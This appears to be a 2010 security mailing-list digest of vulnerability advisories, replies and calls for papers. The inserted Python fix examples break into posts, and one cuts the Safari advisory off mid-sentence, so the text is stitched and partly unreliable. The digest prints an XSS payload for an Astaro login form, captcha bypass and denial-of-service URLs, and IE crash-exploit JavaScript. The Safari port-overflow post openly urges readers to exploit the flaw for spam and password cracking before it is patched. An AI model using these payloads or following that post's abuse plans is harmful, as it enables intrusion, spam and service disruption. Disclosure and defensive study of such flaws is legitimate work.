18.03.2010 - informed developers.
-
Details:

These are Insufficient Anti-automation and Denial of Service
vulnerabilities.

Insufficient Anti-automation:

The parameters characters, width and height are subject to manipulation in
the captcha. They can be set in such a way that allows easy bypass of the
captcha via half-automated or automated (using OCR) methods. And in some
systems (http://websecurity.com.ua/4046/) it's also possible to use session
reuse with the constant captcha bypass method.

http://site/CaptchaSecurityImages.php?width=150&height=100&characters=2

In that way it's possible to set two characters and increase the size of
the captcha.

DoS:

http://site/CaptchaSecurityImages.php?width=1000&height=9000

By setting large values of width and height it's possible to create a large
load on the server.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
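Added example, not the CaptchaSecurityImages script: the server fixes the rendering parameters and the answer length itself, checks a render budget before any image is drawn, and consumes each challenge on its first check so that a solved captcha cannot be reused within a session. The sizes, limits and names are this example's assumptions; the `width`, `height` and `characters` parameter names are the ones the post cites.

```python
import hmac
import secrets
import string
from dataclasses import dataclass

# Server-chosen rendering parameters (assumed values for this example).
CAPTCHA_WIDTH = 120
CAPTCHA_HEIGHT = 40
CAPTCHA_CHARS = 6
MIN_CHARS = 5
MAX_PIXELS = 300 * 100


@dataclass(frozen=True)
class CaptchaParams:
    width: int
    height: int
    characters: int


def params_from_query_unsafe(query: dict) -> CaptchaParams:
    """The pattern the post describes: every parameter taken from the URL."""
    return CaptchaParams(int(query.get("width", CAPTCHA_WIDTH)),
                         int(query.get("height", CAPTCHA_HEIGHT)),
                         int(query.get("characters", CAPTCHA_CHARS)))


def params_from_query(query: dict) -> CaptchaParams:
    """The request gets no say; the server's fixed settings are used."""
    return CaptchaParams(CAPTCHA_WIDTH, CAPTCHA_HEIGHT, CAPTCHA_CHARS)


def check_render_cost(p: CaptchaParams) -> CaptchaParams:
    """Last line of defence before an image buffer is allocated."""
    if p.width <= 0 or p.height <= 0 or p.width * p.height > MAX_PIXELS:
        raise ValueError("captcha size exceeds the render budget")
    if p.characters < MIN_CHARS:
        raise ValueError("too few characters to resist guessing or OCR")
    return p


class CaptchaService:
    ALPHABET = string.ascii_uppercase + string.digits

    def __init__(self):
        self._answers = {}   # session_id -> expected text

    def issue(self, session_id: str, query: dict) -> CaptchaParams:
        params = check_render_cost(params_from_query(query))
        self._answers[session_id] = "".join(
            secrets.choice(self.ALPHABET) for _ in range(params.characters))
        return params

    def check(self, session_id: str, answer: str) -> bool:
        # pop() consumes the challenge whether or not the answer is right, so
        # a solved captcha cannot be replayed on further submissions.
        expected = self._answers.pop(session_id, None)
        if expected is None:
            return False
        return hmac.compare_digest(expected.encode(),
                                   answer.strip().upper().encode())
```

The two URLs from the post, `width=1000&height=9000` and `width=150&height=100&characters=2`, both fail `check_render_cost` when read the unsafe way and are simply ignored by `params_from_query`.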



Safari browser port blocking bypassed by integer overflow

2010-03-23 Thread Gary Niger

 g . o . a . t . s . e   s  . e . c . u . r . i . t . y 
  g . a . p . i . n . g   h . o . l . e . s  e . x . p . o . s . e . d
 http://security.goatse.fr/
   (323) 306-4576 


attention: due to technical limitations, this advisory cannot be displayed 
correctly. to view with images and video, visit the following page: 
http://encyclopediadramatica.com/Safari_XPS_Attack 
warning: some of the content on this link may offend you and your employer.

We at the Goatse Security labs have been delving into an old (but also new)
class of web exploits originally coined cross-protocol scripting, but now more
commonly referred to as inter-protocol exploitation. 

Goatse Security has a double feature for you, starting with a 0day vuln:

* Safari (and other WebKit-based) browser port blocking bypassed by integer
overflow

and a technique that, as far as I know, has not been premiered before:

* XHR (XMLHttpRequest) as a vector for mail merging or wordlist attacks in
   XPS/IPE attacks

We're going to show you how these two methods combine like Voltron into a whole
much larger than its parts. At the end of this short advisory you will be able
to take any Safari web browser and make it a spam drone, a wordlist-based logon
cracker for networks, or a relay for payloads to arbitrary daemons. You will be
able to do all of this without passing any shellcode or alerting any IDS to
compromise. 

Let's cover the bug.

First, I would like to give credit to my cat, Gary C. Berries, as the initial
researcher to uncover this bug. Without my cat's assistance as an enterprise
class keyboard-based integer fuzzer this vulnerability would have been left 
unearthed.

Apple is going to learn several lessons here, the most important of which is 
probably not to let an unsigned short pose as anything other than an unsigned 
short. Open up a Safari browser on your favorite chode-sniffing operating 
system. Go to a "banned" port like 25 and you'll get an error:

___Not allowed to use restricted network port___ (WebKitErrorDomain:103) 

Add 65536 to 25 to make 65561 and revisit the site on this new port-- no such
cockblocking. You're good to go. You can now use the Safari web browser as a
device to hit any port on any address with a cross-protocol scripting attack.

HOWTO video! http://vimeo.com/10302434

List of Webkit-based browsers found to be affected:
OS X Safari
iPhone/iPod Safari
iPad Safari (confirmed with iPad Simulator in SDK 3.2 beta 4 w/ XCode 3.2.2)
Arora
iCab
OmniWeb
Stainless

The only Webkit-based browser found to not be vulnerable:
Google Chrome

For all Apple's talk of "think different" the only one actually doing so in
regards to browser security is Google. XSS, XPS/IPE, all the traditional
methods fail against Chrome. Google, I don't even care that you are the most
ruthlessly evil corporation in existence anymore. Your stuff just works. You
had me sold at functional reliability. There was a time in my life that I had
large concern about corporate ethics. Now I know that all corporations are
evil. Some more than others. The one who is evil and smart will only ruin you
with malice, where the one that is evil and stupid can ruin you out of both
malice and out of sheer incompetence.

To give this exploit a little of that "je ne sais quoi", we need to come up 
with a good attack vector. Now we're going to show you how Apple didn't just
unearth a decade-old vulnerability and make it viable again a la Microsoft, it
actually becomes more viable to exploit in this new generation than it was at
the time of its inception. When cross-protocol scripting was born, Javascript
was pretty young. There wasn't a whole lot you could do with it then--any bits
of Javascript now called AJAX wouldn't be a cross-browser standard until 2004.

So I looked at this integer overflow and I thought to myself what exactly I'd 
find this useful for. The answers I came up with were:

* Getting idiot Mac-using creative people at bulk mailing companies to click
   on links which spew SMTP envelopes at their internal mailserver, thereby
   utilizing someone else's email reputation to send CPA offers of my own.
* Bruteforcing device passwords via a wordlist and then phoning home
* Reflashing network devices with firmware more fun than the factory default
* Relay exploit payloads to non-HTTP daemons on arbitrary TCP ports
* Get a Safari web browser to do pretty much anything on any TCP port and not
   have any current IDS/IPS in existence be any wiser for it.

We summarily implemented all of these things, but I'm going to show you how to
do the first one since the code is trivially altered to do many of the others.
Also because it is the most fun and easy way to monetize this particular vuln,
and I'm hoping other people will make use of it before Apple patches!

(The best part of our first cross-protocol scripting PoC release:
http://encyclopediadramatica.com/Firefox_X
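An added example, not WebKit code: a restricted-port check that compares the full integer before the value is narrowed to a 16-bit port field (the wrap the post describes with 25 + 65536 = 65561), beside one that rejects out-of-range values first, plus the same check applied to a whole URL. The restricted-port set is an illustrative subset, and the function names are this example's own.

```python
from urllib.parse import urlsplit

# Illustrative subset of ports a browser refuses to connect to; 25 is the one
# the post uses. This is not WebKit's list.
RESTRICTED_PORTS = frozenset({21, 22, 23, 25, 110, 143, 6667})


def to_port_field(port: int) -> int:
    """What a 16-bit port field actually carries after the check has run."""
    return port & 0xFFFF


def is_port_allowed_buggy(port: int) -> bool:
    # Compares the full integer: 65561 is "not restricted", but the socket
    # layer later stores it in 16 bits and connects to port 25.
    return port not in RESTRICTED_PORTS


def is_port_allowed(port: int) -> bool:
    # Reject anything outside the representable range before comparing.
    if not 1 <= port <= 65535:
        return False
    return port not in RESTRICTED_PORTS


def connect_decision(port: int, check) -> tuple:
    """(allowed by the check, port the connection would really be made to)."""
    return check(port), to_port_field(port)


def url_port_allowed(url: str) -> bool:
    """Port check for a whole URL; urlsplit() itself refuses out-of-range ports."""
    try:
        parts = urlsplit(url)
        port = parts.port
    except ValueError:
        return False
    if port is None:
        port = {"http": 80, "https": 443}.get(parts.scheme, 0)
    return is_port_allowed(port)
```

The general rule the post's bug illustrates: validate a value in the width it will be used at, or narrow it first and check the narrowed value, never check a wide value and then silently truncate it.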

Re: Vulnerability Astaro Security Linux v5

2010-03-23 Thread Akos Szalkai
Astaro v5 has been end-of-life since October 2007.  Even v6 is EOL
(since October 2009).

Akos

-- 
Akos Szalkai 
Principal IT Consultant, CISA
2F 2000 Szamitastechnikai es Szolgaltato Kft.
Tel: (+36-1)-4887700  Fax: (+36-1)-4887709  WWW: http://www.2f.hu/



[HITB-Announce] HITBSecConf2009 - Malaysia Videos Released!

2010-03-23 Thread Hafez Kamal

The videos from the 7th annual Hack in The Box security conference held
in Malaysia last year have been released! On a related note, do keep in
mind that online registration for HITBSecConf2010 - Dubai closes in less
than 4 weeks and the Call for Papers for HITBSecConf2010 - Amsterdam is
still open for submissions (Submissions are due no later than 19th April 2010)!

HITB CFP
http://cfp.hackinthebox.org/

===

HITB Videos
http://video.hitb.org/

DL - Torrent - Day 1
http://video.hitb.org/hitbsecconf2009malaysia-day1.torrent

DL - Torrent - Day 2
http://video.hitb.org/hitbsecconf2009malaysia-day2.torrent

Presentation Materials
http://conference.hitb.org/hitbsecconf2009kl/materials/



Keynote 1: Joe Grand (President, Grand Idea Studio)
Keynote 2: Rop Gonggrijp (Hacker and Activist)
Keynote 3: Ed Skoudis (Co-Founder, InGuardians)
Keynote 4: Julian Assange (Founder of WikiLeaks.org)

Presentations By:

1.) Alex 'kuza55' Kouzemtchenko (Associate Consultant, statsec)

2.) Alexander Gazet (Sogeti ESEC Research & Development)

3.) Andrea Barisani (Chief Security Engineer, Inverse Path)

4.) Babak Javadi (TOOOL USA)

5.) Bruno Goncalves de Oliveira (Computer Engineer, iBLISS)

6.) Chris Evans (Information Security Engineer/Troublemaker/Chrome
Security, Google Corp)

7.) Damien Aumaitre (Sogeti)

8.) Daniele Bianco (Hardware Hacker, Inverse Path)

9.) Deviant Olam (TOOOL USA)

10.) Dimitrios Petropoulos (Managing Director, ENCODE Middle East)

11.) Frédéric Raynal (Head of Research & Software Development,
Sogeti/Cap Gemini)

12.) Guillaume Delugré (Sogeti)

13.) Haroon Meer (Technical Director, Sensepost)

14.) Job De Haas (Riscure)

15.) Julien Tinnes (Information Security Engineer, Google Corp)

16.) Justin Lundy (Founder & CEO, Subterrain)

17.) Lee Chin Sheng (Independent Network Security Researcher)

18.) Lucas Adamski (Director, Security Engineering, Mozilla Corp)

19.) Malaysian Amateur Radio Emergency Service (MARES)

20.) Mark Dowd (ISS)

21.) Meling Mudin (Founder, security.org.my)

22.) Nguyen Anh Quynh (Researcher, Japan Institute of Advanced
Industrial Science and Technology)

23.) Nishad Herath (CEO, Novologica)

24.) Paul Theriault (Consultant, SIFT)

25.) Saumil Shah (Founder, Net-Square)

26.) Sheran Gunasekera (Head of Research & Development, ZenConsult)

27.) Steve Anson (Director, Forward Discovery)

28.) Tavis Ormandy (Information Security Engineer, Google Corp)

29.) Wes Brown (Security Consultant, IOActive)

30.) Yoann Guillot (Sogeti ESEC Research & Development)


---
Hafez Kamal
HITB Crew
Hack in The Box (M) Sdn. Bhd.
Suite 26.3, Level 26, Menara IMC,
No. 8 Jalan Sultan Ismail,
50250 Kuala Lumpur,
Malaysia

Tel: +603-20394724
Fax: +603-20318359



Re: Vulnerability Astaro Security Linux v5

2010-03-23 Thread jdaniel
Astaro Security Linux V5 is obsolete and past EOL.  V5 has not been supported 
in years.  Customers are encouraged to run current software.


Re: IE 6.0 - Local Crash Exploit

2010-03-23 Thread Veg

Spot the difference:

###
5QIM 2.0.0.9 IE Crash Exploit
2008-02-25 08:26

style="display:none;">



function crash() {
var buff = '';
for(i=0;i<=5000;i++) {buff+="AA";}
object = document.getElementById("xiaonei");
object.Start5QIMWithItv('test','test',buff);
}


Crash...


###
and:

On Sat, 20 Mar 2010, i...@securitylab.ir wrote:


###
# Securitylab.ir
###
Vul:




function crash() {
var buff = '';
for(i=0;i<=5000;i++) {buff+="AA";}
object = document.getElementById("opi");
object.Start5QIMWithItv('test','test',buff);
}


.!.

###
# IE 6.0 Local Crash Exploit , By: Pouya Daneshmand 
(whh_i...@yahoo.com,Pouya.Securitylab.ir)
###


Yep - the date, the object name and the attribution.

http://hi.baidu.com/flyhat/blog/item/64e6a700a59c5015728b6518.html


MX Simulator Server 2010-02-06 Remote Buffer Overflow PoC

2010-03-23 Thread Salvatore Fresta aka Drosophila
MX Simulator Server is affected by a remote stack overflow. This bug
was found by Luigi Auriemma.

A Proof of Concept can be found on the following link:
http://www.salvatorefresta.net/files/poc/PoC-MXSimulatorServer2010-02-06.zip


-- 
Salvatore Fresta aka Drosophila
http://www.salvatorefresta.net
CWNP444351


[DSECRG-09-064] SAP GUI - Insecure method, code execution

2010-03-23 Thread Alexandr Polyakov
Digital Security Research Group [DSecRG] Advisory   #DSECRG-09-064

Application:             SAP GUI
Versions Affected:       SAP GUI (SAP GUI 7.1)
Vendor URL:              http://SAP.com
Bugs:                    Insecure method. Code Execution.
Exploits:                YES
Reported:                16.10.2009
Vendor response:         27.10.2009
Date of Public Advisory: 23.03.2010
Author:                  Alexey Sintsov
                         from Digital Security Research Group [DSecRG]
                         (research [at] dsecrg [dot] com)
Description
***

An insecure method was found in the SAPBExCommonResources (class BExGlobal) ActiveX
control component, which is part of SAP GUI.


Details
***
can be found in http://dsecrg.com/pages/vul/show.php?id=164

Fix Information
***
All patches are available since December via note 1407285

References
**
http://dsecrg.com/pages/vul/show.php?id=164
https://service.sap.com/sap/support/notes/1407285.




About
*

Digital Security is leading IT security company in Russia, providing 
information security consulting, audit and penetration testing services, risk 
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and 
PCI DSS standards. Digital Security Research Group focuses on web application 
and database security problems with vulnerability reports, advisories and 
whitepapers posted regularly on our website.


Contact:research [at] dsecrg [dot] com
http://www.dsecrg.com

Polyakov Alexandr. PCI QSA.
Head of security audit department
Head of Digital Security Research Group
__
DIGITAL SECURITY
phone:  +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@dsec.ru  
www.dsec.ru
www.dsecrg.com
www.pcidss.ru


---
This message and any attachment are confidential and may be privileged or
otherwise protected from disclosure. If you are not the intended recipient
any use, distribution, copying or disclosure is strictly prohibited. If you
have received this message in error, please notify the sender immediately
either by telephone or by e-mail and delete this message and any attachment
from your system. Correspondence via e-mail is for information purposes only.
Digital Security neither makes nor accepts legally binding statements by
e-mail unless otherwise agreed.
---



Vulnerability Astaro Security Linux v5

2010-03-23 Thread Mehdi Mahdjoub - Sysdream IT Security Services
Program  : Astaro Security Linux v5
PoC  : XSS
Homepage : http://www.astaro.com/
Found by : Vincent Hautot
Contact  : v.hautot () sysdream com

//- Application description

Astaro Security Linux is a complete network security solution that
protects organizations against a wide range of threats to security
and productivity.


//- Description of vulnerability

This XSS was found on the index.fpl page in the login form. Using this flaw
it is possible to execute JavaScript code.
Posting using multipart/form-data does not work; use this data instead:

username...@fucking.mail&password=DTC&SID=>">alert("XSS !!!")
&cur_width=1&window_height=700&id=0121&jaction=none&frameset=active&new_id=0


//- Credits

http://www.sysdream.com/article.php?story_id=326&section_id=78




IE 6.0 - Local Crash Exploit

2010-03-23 Thread info
###
# Securitylab.ir
###
Vul:




function crash() {
var buff = '';
for(i=0;i<=5000;i++) {buff+="AA";}
object = document.getElementById("opi");
object.Start5QIMWithItv('test','test',buff);
}


.!.

###
# IE 6.0 Local Crash Exploit , By: Pouya Daneshmand 
(whh_i...@yahoo.com,Pouya.Securitylab.ir)
###


[SECURITY] [DSA 2021-1] New spamass-milter packages fix remote command execution

2010-03-23 Thread Giuseppe Iuculano
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-2021-1                   secur...@debian.org
http://www.debian.org/security/                        Giuseppe Iuculano
March 22, 2010                          http://www.debian.org/security/faq
- 

Package: spamass-milter
Vulnerability  : missing input sanitization
Problem-Type   : remote
Debian-specific: no
CVE Id(s)  : none assigned yet
Debian Bug : 573228

A missing input sanitization was discovered in spamass-milter, a milter
used to filter mail through SpamAssassin.
This allows a remote attacker to inject and execute arbitrary shell commands.

For the stable distribution (lenny), this problem has been fixed in
version 0.3.1-8+lenny1.

For the testing (squeeze) and unstable (sid) distribution this problem
has been fixed in version 0.3.1-9.

We recommend that you upgrade your spamass-milter package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian (stable)
- ---

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-annou...@lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

Re: Firefox 3.6 for Windows includes a forged CA cert

2010-03-23 Thread Mike Duncan
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Good question. Confirmed on Linux version as well (Mozilla/5.0 (X11; U;
Linux i686; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6). More
information about the rogue-CA can be found here:
http://www.phreedom.org/research/rogue-ca/.

# openssl x509 -in MD5CollisionsInc.pem -noout -text
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 66 (0x42)
Signature Algorithm: md5WithRSAEncryption
Issuer: C=US, O=Equifax Secure Inc., CN=Equifax Secure Global
eBusiness CA-1
Validity
Not Before: Jul 31 00:00:01 2004 GMT
Not After : Sep  2 00:00:01 2004 GMT
Subject: CN=MD5 Collisions Inc. (http://www.phreedom.org/md5)
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:ba:a6:59:c9:2c:28:d6:2a:b0:f8:ed:9f:46:a4:
a4:37:ee:0e:19:68:59:d1:b3:03:99:51:d6:16:9a:
5e:37:6b:15:e0:0e:4b:f5:84:64:f8:a3:db:41:6f:
35:d5:9b:15:1f:db:c4:38:52:70:81:97:5e:8f:a0:
b5:f7:7e:39:f0:32:ac:1e:ad:44:d2:b3:fa:48:c3:
ce:91:9b:ec:f4:9c:7c:e1:5a:f5:c8:37:6b:9a:83:
de:e7:ca:20:97:31:42:73:15:91:68:f4:88:af:f9:
28:28:c5:e9:0f:73:b0:17:4b:13:4c:99:75:d0:44:
e6:7e:08:6c:1a:f2:4f:1b:41
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage:
Digital Signature, Non Repudiation, Certificate Sign,
CRL Sign
X509v3 Basic Constraints: critical
CA:TRUE
X509v3 Subject Key Identifier:
A7:04:60:1F:AB:72:43:08:C5:7F:08:90:55:56:1C:D6:CE:E6:38:EB
X509v3 Authority Key Identifier:

keyid:BE:A8:A0:74:72:50:6B:44:B7:C9:23:D8:FB:A8:FF:B3:57:6B:68:6C

Netscape Comment:
3
Signature Algorithm: md5WithRSAEncryption
a7:21:02:8d:d1:0e:a2:80:77:25:fd:43:60:15:8f:ec:ef:90:
47:d4:84:42:15:26:11:1c:cd:c2:3c:10:29:a9:b6:df:ab:57:
75:91:da:e5:2b:b3:90:45:1c:30:63:56:3f:8a:d9:50:fa:ed:
58:6c:c0:65:ac:66:57:de:1c:c6:76:3b:f5:00:0e:8e:45:ce:
7f:4c:90:ec:2b:c6:cd:b3:b4:8f:62:d0:fe:b7:c5:26:72:44:
ed:f6:98:5b:ae:cb:d1:95:f5:da:08:be:68:46:b1:75:c8:ec:
1d:8f:1e:7a:94:f1:aa:53:78:a2:45:ae:54:ea:d1:9e:74:c8:
76:67



Mike Duncan
ISSO, Application Security Specialist
Government Contractor with STG, Inc.
NOAA :: National Climatic Data Center


On 03/19/2010 04:22 PM, Francis Litterio wrote:
> In Firefox 3.6 for Windows, go to Tools -> Options -> Advanced -> Encryption 
> ->
> View Certificates -> Authorities and scroll down to the entry for "Equifax
> Secure Inc." and you'll see a cert labeled "MD5 Collisions Inc
> (http://www.phreedom.org/md5)" grouped with the other Equifax certs.
> 
> Yes, it's expired, so it poses no real threat, but why is the Mozilla Project
> shipping Firefox with that cert?  It just causes FUD.
> --
> Fran
> 
> 
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkunqlwACgkQnvIkv6fg9hZ9xgCeN2pHJd7cR/K0XoLAI4MKSR7P
6TsAn2gJ5czYDikEK25OcVsZngS/lGIN
=xb7R
-END PGP SIGNATURE-


REMINDER: Month of PHP Security 2010 - CALL FOR PAPERS - Only 3 weeks left

2010-03-23 Thread Stefan Esser
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Month of PHP Security 2010 - CALL FOR PAPERS
- 

Three years ago, in March 2007, the Hardened-PHP project had organized
the Month of PHP Bugs. During one month more than 40 vulnerabilities in
the PHP interpreter were disclosed in order to improve the overall
security of PHP. Now, three years later, SektionEins GmbH will
continue in the same spirit and organize the Month of PHP Security.

The intention of the Month of PHP Security is to gather the best
research and articles about PHP security topics from the security
community and share them with the rest of the world. This time the goal
is not only to improve the security of PHP itself and applications
directly by fixing security bugs, but also to help PHP developers
around the world to write better and more secure PHP applications.

The Month of PHP Security will be held in May 2010 by SektionEins
GmbH. During the month of May all qualifying entries will be published
at http://php-security.org day by day.


CFP Committee
- -
The CFP committee for the Month of PHP Security consists of

1) Johann-Peter Hartmann
2) Stefan Esser
3) Fukami
4) Ben Fuhrmannek

The CFP committee will review all submissions and select the list of
articles that will be published on http://php-security.org


Accepted Topics/Articles
- 
* New vulnerability in PHP [1]
  (not simple safe_mode, open_basedir bypass vulnerabilities)
* New vulnerability in PHP related software [1]
  (popular 3rd party PHP extensions/patches)
* Explain a single topic of PHP application security in detail
  (such as guidelines on how to store passwords)
* Explain a complicated vulnerability in/attack against a PHP
  widespread application [1]
* Explain a complicated topic of attacking PHP (e.g. explain how to
  exploit heap overflows in PHP's heap implementation)
* Explain how to attack encrypted PHP applications
* Release of a new open source PHP security tool
* Other topics related to PHP or PHP application security

[1] Articles about new vulnerabilities should mention possible
fixes or mitigations.


Responsible Disclosure
- --
In case of submitted vulnerabilities SektionEins GmbH will contact
the security team of the software vendor after the submission deadline
and share the vulnerability information with them. Along with the
vulnerability information SektionEins will provide the name of the
submitting party in order to give proper credits.


Prizes
- --
At the end of May the CFP committee will review the published
material and determine the best entries. Selected winners will
get the following prizes.

   1.      1000 EUR + Syscan Ticket + CodeScan PHP License

   2.      750 EUR + Syscan Ticket

   3.      500 EUR + Syscan Ticket

   4.      250 EUR + Syscan Ticket

   5.-6.   CodeScan PHP License

   7.-16.  Amazon Coupon of 65 USD/50 EUR

SektionEins reserves the right to disqualify any submitted entry.
While employees of SektionEins can and will submit entries for
the Month of PHP Security they are excluded from receiving prizes.

The 1000 EUR cash prize and the Syscan tickets were generously
sponsored by Syscan. CodeScan PHP Licenses were sponsored by
CodeScan Limited. All other cash and non-cash prizes are sponsored
by SektionEins.

The winners of the Syscan tickets can choose one of the four
Syscan 2010 conferences to go to. Syscan Tickets include free
admission to the conference, speaker's dinner and speaker party.
Hotel and travel costs are NOT included.

Please note that non-cash prizes cannot be changed into cash prizes.


Submission
- --
Submissions should be sent to c...@php-security.org and consist of the
following information:

1) Name and contact information (e-mail, postal address)
2) Employer and/or affiliations
3) Article about one of the allowed topics (at least 1000 words)
4) Optionally additional material like slides, whitepaper in PDF format

All submissions must be in English. The preferred delivery format is
plain text or HTML, but PDF is also accepted. Please pack all the
required items (pictures, text, ...) in a ZIP archive and submit this
ZIP archive by email.

Deadline for submissions is April 11, 2010.


Additional Information
- --
After submission SektionEins GmbH will acknowledge submissions with
a signed email. If you do not receive such an email within one week
after submission, then please contact us at c...@php-security.org
again.

By submitting your article you are granting SektionEins GmbH the rights
to reproduce, distribute, advertise and show your article including but
not limited to http://php-security.org, printed and/or electronic
advertisements, and all other media. However you are still allowed to
publish your own work in whatever way you want.


Thanks
- --
We would like to thank Syscan and Coseinc for generously offering
1000 EUR cash prize and four tickets to Syscan

[ MDVSA-2010:064 ] libpng

2010-03-23 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:064
 http://www.mandriva.com/security/
 ___

 Package : libpng
 Date: March 23, 2010
 Affected: 2009.0, 2009.1, 2010.0, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in libpng:
 
 The png_decompress_chunk function in pngrutil.c in libpng 1.0.x before
 1.0.53, 1.2.x before 1.2.43, and 1.4.x before 1.4.1 does not properly
 handle compressed ancillary-chunk data that has a disproportionately
 large uncompressed representation, which allows remote attackers to
 cause a denial of service (memory and CPU consumption, and application
 hang) via a crafted PNG file, as demonstrated by use of the deflate
 compression method on data composed of many occurrences of the same
 character, related to a decompression bomb attack (CVE-2010-0205).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0205
 ___

 Updated Packages:


Re: Firefox 3.6 for Windows includes a forged CA cert

2010-03-23 Thread adam
If you check further into that certificate's configuration, you'll see that it's
explicitly disabled, so that if it is encountered, it won't be accepted.

Firefox ships with that certificate, so that it can be stopped from using it.


CFP - GameSec 2010 - Conference on Decision and Game Theory for Security

2010-03-23 Thread Albert Levi

CALL FOR PAPERS

GameSec 2010 - Conference on Decision and Game Theory for Security
22-23 November 2010, Berlin, Germany

www.gamesec-conf.org

***
Important Dates

Submission deadline: 15 May 2010
Acceptance date: 23 August 2010
Camera-ready due: 15 September 2010

***
Industry Gold Sponsor: Deutsche Telekom Laboratories
Industry Silver Sponsor: Fraunhofer Heinrich Hertz Institute

Technical co-sponsors:
IEEE Control System Society
International Society of Dynamic Games

***
GameSec 2010, the inaugural Conference on Decision and Game Theory for
Security, will take place on the campus of Technical University Berlin,
Germany, on November 22-23, 2010.

Securing complex and networked systems and managing associated risks become
increasingly important as they play an indispensable role in modern life at
the turn of the information age. Concurrently, security of ubiquitous
communication, data, and computing poses novel research challenges. Security
is a multi-faceted problem due to the complexity of underlying hardware,
software, and network interdependencies as well as human and social factors.
It involves decision making at multiple levels and multiple time scales,
given the limited resources available to both malicious attackers and
administrators defending networked systems.

The GameSec conference aims to bring together researchers who aim to establish
a theoretical foundation for making resource allocation decisions that balance
available capabilities and perceived security risks in a principled manner.
The conference focuses on analytical models based on game, information,
communication, optimization, decision, and control theories that are applied
to diverse security topics. At the same time, the connection between
theoretical models and real-world security problems is emphasized to establish
the important feedback loop between theory and practice. Observing the
scarcity of venues for researchers who try to develop a deeper theoretical
understanding of the underlying incentive and resource allocation issues in
security, we believe that GameSec will fill an important void and serve as a
distinguished forum of highest standards for years to come.

Topics of interest include (but are not limited to):
* Security games
* Security and risk management
* Mechanism design and incentives
* Decentralized security algorithms
* Security of networked systems
* Security of Web-based services
* Security of social networks
* Intrusion and anomaly detection
* Resource allocation for security
* Optimized response to malware
* Identity management
* Privacy and security
* Reputation and trust
* Information security and watermarking
* Physical layer security in wireless networks
* Information theoretic aspects of security
* Adversarial machine learning
* Distributed learning for security
* Cross-layer security
* Usability and security
* Human behavior and security
* Dynamic control of security systems
* Organizational aspects of risk management
* Cooperation and competition in security
* and more...

***
Submission instructions will be available on the conference website.
Prospective authors are encouraged to submit a PDF version of their full
papers in the announced format and in a font no smaller than 10 points. The
initial submissions are limited to 12 single-column pages to decrease the
workload of volunteer reviewers. The camera-ready version of accepted papers
is limited to 20 single-column pages. The conference language is English.

The conference proceedings will be published by Springer in Lecture Notes in
Computer Science (LNCS). The proceedings will also be made available online
by Springer in full-text electronic form via SpringerLink.

***
Steering Board

Tansu Alpcan (TU-Berlin)
Nick Bambos (Stanford Univ.)
Tamer Başar (Univ. of Illinois)
Anthony Ephremides (Univ. of Maryland)
Jean-Pierre Hubaux (EPFL)

***
2010 Organizers

General Chair:
Tansu Alpcan (TU-Berlin)

TPC Co-Chairs:
- John Baras (Univ Maryland)
- Levente Buttyan (Budapest Univ.)

Publicity Co-Chairs:
- Zhu Han (Univ. of Houston)
- Albert Levi (Sabanci Univ.)

Publication Chair:
Holger Boche (TU-Berlin)

Finance and Registration Chair:
Slawomir Stanczak (TU-Berlin)

Local Chair:
Jean-Pierre Seifert (TU-Berlin)

***
Technical Program Committee

* Eitan Altman (INRIA, France)
* Sonja Buchegger (KTH, Sweden)
* Mario Cagalj (Univ. of Split, Croatia)
* Srdjan Capkun (ETH Zurich, Switzerland)
* Lin Chen (Univ. of Paris-Sud 11, France)
* John Chuang (UC Berkeley, USA)
* Sajal K. Das (Univ. Texas at A., USA)
* Merouane Debbah (Supelec, France)
* Mark Felegyhazi (ICSI -Berkeley, USA)
* Jens Grossklags (Princeton Univ., USA)
* Are Hjorungnes (Univ. of Oslo, Norway)
* Eduard A. Jorswieck (Tech. Univ. Dresden, Germany)
* Iordanis Koutsopoulos (Univ. of Thessaly, Greece)
* Jean Leneutre (Telecom ParisTech, France)
* Xiang-Yang Li (Illinois Inst. of Tech., USA)
* Li (Erran) Li (Bell Labs., USA)
* M. Hossein Manshaei (EPFL, Switzerland)
* Piet

{PRL} Lexmark Multiple Laser Printer Remote Stack Overflow

2010-03-23 Thread Francis Provencher
#

Application:   Lexmark Multiple Laser Printer Remote Stack Overflow

Platforms:   Lexmark Multiple Laser printer

Exploitation:   Remote Exploitable

CVE Number:   CVE-2010-0619

Discover Date:   2010-01-06

Author:   Francis Provencher (Protek Research Lab's)

Website:   http://www.protekresearchlab.com

#

1) Introduction
2) Report Timeline
3) Technical details
4) Products affected
5) The Code

#

=
1) Introduction
=

Lexmark specializes in printers and printer accessories. Its current
range of products includes color and monochrome laser printers and
inkjet printers, both of which may include scanners (including
all-in-one devices with faxing and copying capabilities and photo
printers), and dot matrix printers. Lexmark was one of the first
companies to release wifi inkjet printers and the very first to
release printers with a web-enabled touchscreen, coming in early
September of 2009. They also offer a wide variety of laser printers
with software solutions for more professional printing environments.

(Wikipedia)

#


